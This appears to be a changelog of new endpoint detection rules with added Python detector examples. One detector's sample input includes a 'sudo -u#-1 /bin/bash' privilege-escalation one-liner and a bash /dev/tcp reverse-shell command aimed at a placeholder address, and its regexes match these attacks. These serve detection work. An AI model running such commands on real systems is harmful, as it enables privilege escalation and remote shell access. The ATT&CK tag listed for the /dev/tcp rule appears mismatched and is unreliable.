CREATED: NIX-PRIVILEGE-ESCALATION-SUDO-U (#2124)
sudo with the following command lines:
sudo -u#-1 or
which indicate the attempted exploitation of CVE-2019-14287.
CREATED: NIX-SHELL-DEV-TCP-UP (#2177)
This detector identifies the use of TCP sockets (/dev/tcp) to connect to a remote IP address, download files and redirect the remotely hosted files into a shell for execution. Connecting to a remote host with TCP sockets is an alternative file download technique that behaves similarly to wget or curl.
ATT&CK Technique T1190
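The two NIX detectors above both key on process command lines. The following is an added example, not detector code from the original page or its vendor: it scans constructed sample command lines for the sudo -u#-1 form tied to CVE-2019-14287 and for a /dev/tcp connection whose output is handed to a shell. The regexes, the rule names used as labels, and the sample lines (TEST-NET addresses) are assumptions made for this example.

```python
import re

# Constructed sample command lines for exercising the rules below; not real telemetry.
SAMPLE_CMDLINES = [
    "sudo -u#-1 /bin/bash",
    "sudo -u alice ls -la /home",
    "bash -c 'exec 3<>/dev/tcp/203.0.113.10/4444; sh <&3'",
    "curl -sS https://example.com/pkg.tar.gz -o /tmp/pkg.tar.gz",
]

# sudo invoked with a -u argument of "#-1" (optionally quoted); the character class
# stops the match at a pipeline or command separator so a later command is not merged in.
SUDO_UID_RE = re.compile(r"\bsudo\b[^|;&]*\s-u\s*['\"]?#-1\b")

# bash's /dev/tcp/<host>/<port> pseudo-device; host and port are captured for the alert.
DEV_TCP_RE = re.compile(r"/dev/tcp/(?P<host>[^/\s]+)/(?P<port>\d{1,5})")

# A shell interpreter token (sh, bash, dash, zsh) standing alone on the command line,
# i.e. at the start or after whitespace, a pipe, a separator or an opening paren.
SHELL_RE = re.compile(r"(?:^|[\s|;&(])(?:ba|da|z)?sh\b")


def detect(cmdline):
    """Return the list of rule names that fire on a single command line."""
    hits = []
    if SUDO_UID_RE.search(cmdline):
        hits.append("NIX-PRIVILEGE-ESCALATION-SUDO-U")
    # The /dev/tcp rule requires both the socket path and a shell to feed it into,
    # so a plain /dev/tcp health check without a shell does not fire.
    if DEV_TCP_RE.search(cmdline) and SHELL_RE.search(cmdline):
        hits.append("NIX-SHELL-DEV-TCP-UP")
    return hits


def scan(cmdlines):
    """Return (cmdline, hits) pairs for every command line that triggered a rule."""
    results = []
    for cmdline in cmdlines:
        hits = detect(cmdline)
        if hits:
            results.append((cmdline, hits))
    return results


if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_CMDLINES):
        print(", ".join(hits), "<-", cmdline)
```

On the sample input only the first and third lines produce hits; the ordinary sudo -u alice invocation and the curl download stay silent, which is the false-positive behaviour a tuned detector should have.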
CREATED: NIX-PASSWD-OUTPUT-HIDDEN-TEMP (#2211)
This detector identifies dumping the passwd file to the tmp directory within a hidden directory or as a hidden file. Adversaries utilize these files and directories for reconnaissance.
ATT&CK Technique T1087
CREATED: WIN-DXCAP-APPWHITELIST-BYPASS (#2234)
The DirectX diagnostics and debugger tool (dxcap.exe) included with Visual Studio can be used to bypass application whitelisting. This detector identifies commands which may exploit this technique.
ATT&CK Technique T1218
CREATED: WIN-SCHTASK-TASKNAME-LIKELY-RANDOM (#2245)
This detector identifies the creation of scheduled task names that have a low trigram frequency score. The low trigram frequency score indicates that the scheduled task is abnormal and randomly named. Randomly named scheduled tasks are a common artifact of known malware families such as Dridex and ThreadKit.
ATT&CK Technique T1053
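The "low trigram frequency score" idea behind WIN-SCHTASK-TASKNAME-LIKELY-RANDOM can be reproduced with a small character-trigram model. The code below is an added example and not the vendor's scoring method: it learns trigram counts from a constructed corpus of benign scheduled task names, scores a candidate name by the mean smoothed log-probability of its trigrams, and flags names that fall below a threshold. The corpus, the smoothing weight, the -9.0 threshold and the function names are all assumptions for this example.

```python
import math
import re
from collections import Counter

# Normalised alphabet is a-z, 0-9 and space, so the trigram space has 37**3 entries.
ALPHABET_SIZE = 37
VOCAB = ALPHABET_SIZE ** 3
ALPHA = 0.01  # additive smoothing weight for unseen trigrams (assumption)

# Constructed corpus of benign scheduled task names used to train the model.
BENIGN_TASK_NAMES = [
    "GoogleUpdateTaskMachineCore",
    "GoogleUpdateTaskMachineUA",
    "MicrosoftEdgeUpdateTaskMachineCore",
    "OneDrive Standalone Update Task",
    "Adobe Acrobat Update Task",
    "Firefox Default Browser Agent",
    "Office Automatic Updates",
    "Windows Defender Scheduled Scan",
    "CreateExplorerShellUnelevatedTask",
    "Microsoft Compatibility Appraiser",
    "SystemSoundsService",
    "Notepad++ Update",
]


def normalize(name):
    """Lowercase, collapse non-alphanumerics to one space, pad with a boundary space."""
    collapsed = re.sub(r"[^a-z0-9]+", " ", name.lower()).strip()
    return f" {collapsed} "


def trigrams(text):
    return [text[i:i + 3] for i in range(len(text) - 2)]


class TrigramModel:
    def __init__(self, corpus):
        self.counts = Counter()
        for name in corpus:
            self.counts.update(trigrams(normalize(name)))
        self.total = sum(self.counts.values())

    def log_prob(self, trigram):
        # Additive smoothing keeps unseen trigrams at a small non-zero probability.
        return math.log((self.counts[trigram] + ALPHA) / (self.total + ALPHA * VOCAB))

    def score(self, name):
        """Mean log-probability of the name's trigrams; higher means more 'English-like'."""
        tris = trigrams(normalize(name))
        if not tris:
            # An empty or all-punctuation name carries no signal; treat as minimally likely.
            return float("-inf")
        return sum(self.log_prob(t) for t in tris) / len(tris)


MODEL = TrigramModel(BENIGN_TASK_NAMES)


def score_task_name(name):
    return MODEL.score(name)


def is_likely_random(name, threshold=-9.0):
    """True when the trigram frequency score is below the threshold."""
    return score_task_name(name) < threshold


def flag_random_task_names(names, threshold=-9.0):
    """Return the subset of names that look randomly generated."""
    return [n for n in names if is_likely_random(n, threshold)]


if __name__ == "__main__":
    for candidate in ["Adobe Update Task", "xkqzvjwpt"]:
        print(f"{candidate!r}: score={score_task_name(candidate):.2f} "
              f"random={is_likely_random(candidate)}")
```

With this corpus a name built from common words such as "Adobe Update Task" scores around -6, while a string like "xkqzvjwpt" whose trigrams never occur in the corpus scores near -11, so the threshold cleanly separates them. A production model would be trained on a much larger set of task names observed across an estate, and the threshold tuned against that distribution.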